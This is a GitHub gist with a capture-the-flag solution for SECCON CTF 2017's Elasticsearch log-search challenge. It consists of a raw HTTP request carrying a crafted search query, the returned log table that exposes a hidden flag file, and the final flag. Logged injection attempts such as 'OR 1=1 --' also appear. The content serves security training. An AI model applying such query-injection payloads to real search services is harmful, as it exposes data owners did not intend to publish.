Created
December 9, 2017 19:05
-
-
Save pich4ya/359ff38bf3fa3b6e9dc7f903649a362f to your computer and use it in GitHub Desktop.
SECCON CTF 2017 - Elasticsearch
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
POST /logsearch.php HTTP/1.1 | |
Host: localhost | |
Content-Length: 67 | |
Cache-Control: max-age=0 | |
Origin: http://logsearch.pwn.seccon.jp | |
Upgrade-Insecure-Requests: 1 | |
Content-Type: application/x-www-form-urlencoded | |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 | |
Referer: http://logsearch.pwn.seccon.jp/logsearch.php?aaalongcat | |
Accept-Encoding: gzip, deflate | |
Accept-Language: en-US,en;q=0.9 | |
Connection: close | |
query=verb:GET+AND+flag+AND+response:200+AND+!request:logsearch.php | |
HTTP/1.1 200 OK | |
Date: Sat, 09 Dec 2017 18:56:22 GMT | |
Server: Apache | |
X-Powered-By: PHP/5.4.16 | |
Content-Length: 4535 | |
Connection: close | |
Content-Type: text/html; charset=UTF-8 | |
<!DOCTYPE html> | |
<html> | |
<head> | |
<meta charset="UTF-8"> | |
<meta content="width=device-width, initial-scale=1" name="viewport"> | |
<title>Log search</title> | |
</head> | |
<body> | |
<h1>Log search</h1> | |
<h2>Search</h2> | |
<form method="POST"> | |
<table><tr> | |
<td><input type="text" name="query" value="verb:GET AND flag AND response:200 AND !request:logsearch.php" placeholder="Request.Path"></td> | |
<td><input type="submit"></td> | |
</tr></table> | |
</form> | |
<h2>Result</h2> | |
<table border="1"> | |
<tr> | |
<th>timestamp</th> | |
<th>verb</th> | |
<th>request</th> | |
<th>response</th> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:03:55:45 +0900</td> | |
<td>GET</td> | |
<td>//flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:02:43:53 +0900</td> | |
<td>GET</td> | |
<td>//flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:02:43:00 +0900</td> | |
<td>GET</td> | |
<td>//flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:02:36:05 +0900</td> | |
<td>GET</td> | |
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:02:34:08 +0900</td> | |
<td>GET</td> | |
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:02:33:49 +0900</td> | |
<td>GET</td> | |
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:02:32:51 +0900</td> | |
<td>GET</td> | |
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:02:32:43 +0900</td> | |
<td>GET</td> | |
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:02:32:18 +0900</td> | |
<td>GET</td> | |
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:02:31:39 +0900</td> | |
<td>GET</td> | |
<td>//flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:02:31:15 +0900</td> | |
<td>GET</td> | |
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:02:30:57 +0900</td> | |
<td>GET</td> | |
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:02:24:43 +0900</td> | |
<td>GET</td> | |
<td>//flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:02:23:25 +0900</td> | |
<td>GET</td> | |
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:02:23:20 +0900</td> | |
<td>GET</td> | |
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:02:22:47 +0900</td> | |
<td>GET</td> | |
<td>//flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:02:11:29 +0900</td> | |
<td>GET</td> | |
<td>/?query=flag+OR+1%3D1+--+</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:02:10:34 +0900</td> | |
<td>GET</td> | |
<td>/?query=flag+OR+1%3D1+--+</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:02:08:12 +0900</td> | |
<td>GET</td> | |
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:01:47:22 +0900</td> | |
<td>GET</td> | |
<td>/?query={matchAll={flag}}?pretty=true</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:01:46:59 +0900</td> | |
<td>GET</td> | |
<td>/?query={matchAll={flag}}?pretty=true</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:01:45:00 +0900</td> | |
<td>GET</td> | |
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:01:44:45 +0900</td> | |
<td>GET</td> | |
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:01:43:37 +0900</td> | |
<td>GET</td> | |
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:01:42:37 +0900</td> | |
<td>GET</td> | |
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:01:42:01 +0900</td> | |
<td>GET</td> | |
<td>//flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:01:37:16 +0900</td> | |
<td>GET</td> | |
<td>//flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:01:37:00 +0900</td> | |
<td>GET</td> | |
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:01:36:35 +0900</td> | |
<td>GET</td> | |
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:01:36:13 +0900</td> | |
<td>GET</td> | |
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
</table> | |
</body> | |
</html> | |
http://logsearch.pwn.seccon.jp/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt | |
SECCON{N0SQL_1njection_for_Elasticsearch!} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment